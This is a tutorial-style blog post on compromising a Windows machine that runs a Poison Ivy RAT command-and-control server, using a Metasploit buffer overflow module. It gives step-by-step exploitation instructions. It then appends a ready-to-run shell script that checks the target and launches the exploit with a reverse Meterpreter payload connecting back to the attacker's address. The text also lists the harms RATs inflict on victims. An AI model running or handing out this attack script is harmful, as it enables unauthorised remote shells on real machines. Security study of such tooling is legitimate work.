Good Evening friends. Today we will learn about hacking Windows with the PoisonIvy buffer overflow exploit. This exploit compromises a system through a vulnerability in a RAT. RAT stands for Remote Access Trojan and is a type of malware. It works when a hacker sends a malicious file to the victim and the victim opens it. When the victim opens the malicious file, it connects back to the hacker's machine. The hacker can then control the victim's machine through a command & control (C&C) server. Using RATs, the hacker can
- Block the mouse and keyboard
- Change the desktop wallpaper
- Download, upload, delete and rename files
- Destroy hardware by overclocking
- Drop viruses and worms
- Edit the registry
- Use your internet connection to perform denial of service (DoS) attacks
- Format drives
- Steal passwords and credit card numbers
- Alter your web browser's homepage
- Hide desktop icons, the task bar and files
(Data from Wikipedia)
The picture given below should explain the scenario. More about RATs later.
You can see the command and control server of the Poison Ivy RAT below. Poison Ivy is one of the popular RATs and many variants of it are still active. It was used in the RSA SecurID attack. Poison Ivy RAT 2.1.x versions suffer from a stack buffer overflow vulnerability in the C&C server itself. Using this vulnerability, the machine running the C&C server can be hacked. So here, it's a case of the hacker getting hacked.
We will learn more about RATs in our next howtos. But now let us see how to hack a Windows machine running a PoisonIvy C&C server with the PoisonIvy buffer overflow exploit. Open Metasploit and load the exploit as shown below (if you are unsure of the module name in your copy of Metasploit, `search poisonivy` lists it). The only option you must set is RHOST, the address of the machine running the C&C server. As shown below, this RAT listens on port number 3460 by default, so RPORT is already correct unless the attacker changed it. Set the RHOST and run `check` to see whether the target is vulnerable. Do this before exploiting: as with any stack buffer overflow, a failed attempt can simply crash the C&C process instead of giving you a shell.
Now, as the target is vulnerable, set the payload (for a reverse Meterpreter you also need LHOST, your own address, so the target can connect back) and run the exploit. You should get a meterpreter session on the remote machine as shown below.
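The same procedure as a shell script, added here as an example and not part of the original howto. It drives msfconsole with a resource file, runs `check` first and only exploits when Metasploit reports "The target is vulnerable." The module path, the payload choice and the two addresses are assumptions: confirm the module name with `search poisonivy` in your own Metasploit tree.

```shell
#!/bin/sh
# Added example: run the Poison Ivy C&C check, then exploit only if vulnerable.
# Assumed module name; verify it with `search poisonivy` inside msfconsole.
MODULE="exploit/windows/misc/poisonivy_21x_bof"
RPORT=3460   # default Poison Ivy C&C listening port
PAYLOAD="windows/meterpreter/reverse_tcp"   # assumed payload choice

# Commands for the check phase; $1 is the C&C server address (RHOST).
# Ends with `exit` so msfconsole returns and we can inspect its output.
pi_check_cmds() {
    printf 'use %s\nset RHOST %s\nset RPORT %s\ncheck\nexit\n' \
        "$MODULE" "$1" "$RPORT"
}

# Commands for the exploit phase; $1 is RHOST, $2 is our address (LHOST).
# No `exit` here: the console stays open so the Meterpreter session is usable.
pi_exploit_cmds() {
    printf 'use %s\nset RHOST %s\nset RPORT %s\nset PAYLOAD %s\nset LHOST %s\nexploit\n' \
        "$MODULE" "$1" "$RPORT" "$PAYLOAD" "$2"
}

# Return 0 if msfconsole's check output says the target is vulnerable.
# Metasploit prints "The target is vulnerable." for CheckCode::Vulnerable.
pi_is_vulnerable() {
    printf '%s\n' "$1" | grep -q "The target is vulnerable"
}

main() {
    target="$1"; lhost="$2"
    if [ -z "$target" ] || [ -z "$lhost" ]; then
        echo "usage: $0 <rhost of C&C server> <lhost for reverse payload>" >&2
        exit 2
    fi
    rc=$(mktemp)
    pi_check_cmds "$target" > "$rc"
    out=$(msfconsole -q -r "$rc")
    printf '%s\n' "$out"
    if pi_is_vulnerable "$out"; then
        pi_exploit_cmds "$target" "$lhost" > "$rc"
        msfconsole -q -r "$rc"
    else
        echo "check did not report the target as vulnerable; not exploiting" >&2
    fi
    rm -f "$rc"
}

# Only run when called with both addresses, so the functions can be sourced.
if [ "$#" -eq 2 ]; then
    main "$@"
fi
```

Usage: `sh pi_exploit.sh 192.168.1.5 192.168.1.10` (constructed addresses), with msfconsole on PATH. The check is gated on Metasploit's own verdict rather than on the port being open, because a listener on 3460 proves nothing about the version running behind it.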